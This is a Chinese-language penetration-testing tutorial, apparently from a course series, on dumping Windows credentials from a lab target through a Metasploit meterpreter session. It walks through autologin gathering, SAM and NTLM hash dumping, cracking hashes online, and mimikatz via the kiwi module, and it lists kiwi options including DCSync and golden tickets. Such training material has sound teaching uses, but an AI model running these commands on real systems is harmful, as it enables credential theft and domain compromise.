27.后渗透之获取登录账号密码

一、环境准备

1 MSF-Metasploit Framework

2 一台windiows靶机

二、实战

首先获得一个有SYSTEM权限的meterpreter

1644493974746

1 抓取自动登录账户密码

2 导出SAM数据库本地账户密码文件

3 导出密码哈希

4 使用kiwi模块获取


1 很多人喜欢给在计算机设置自动登录 我们可以通过抓取自动登录的账户密码

run windows/gather/credentials/windows_autologin

如果提示这证明本机并没有配置自动登录

1644493985741

2 还可以通过导出SAM数据库中的本地用户账号(注意需要提权到SYSTEM)

run post/windows/gather/smart_hashdump

1644493996549
用户名
SID
LM哈希:
NTLM哈希1:::

mb

1000

aad3b435b51404eeaad3b435b51404ee

32ed87bdb5fdc5e9cba88547376818d4

1644494007420

3 使用 hashdump 获取密码(注意需要提权到SYSTEM才能使用)

终端内输入 run hashdump

1644494019182

使用在线解析工具 https://www.cmd5.com/

NTLM哈希 例子:32ed87bdb5fdc5e9cba88547376818d4

1644494029236

4 使用load kiwi(使用kiwi模块需要system权限)

kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用

5.1 终端输入 load kiwi

5.2 creds_all 直接获取密码

1644494040171

5.3 使用 kiwi_cmd sekurlsa::logonpasswords 获取密码

1644494050257
ID
kiwi参数和描述

1

creds_all:列举所有凭据

2

creds_kerberos:列举所有kerberos凭据

3

creds_msv:列举所有msv凭据

4

creds_ssp:列举所有ssp凭据

5

creds_tspkg:列举所有tspkg凭据

6

creds_wdigest:列举所有wdigest凭据

7

dcsync:通过DCSync检索用户帐户信息

8

dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID

9

golden_ticket_create:创建黄金票据

10

kerberos_ticket_list:列举kerberos票据

11

kerberos_ticket_purge:清除kerberos票据

12

kerberos_ticket_use:使用kerberos票据

13

kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令

14

lsa_dump_sam:dump出lsa的SAM

15

lsa_dump_secrets:dump出lsa的密文

16

password_change:修改密码

17

wifi_list:列出当前用户的wifi配置文件

18

wifi_list_shared:列出共享wifi配置文件/编码

Last updated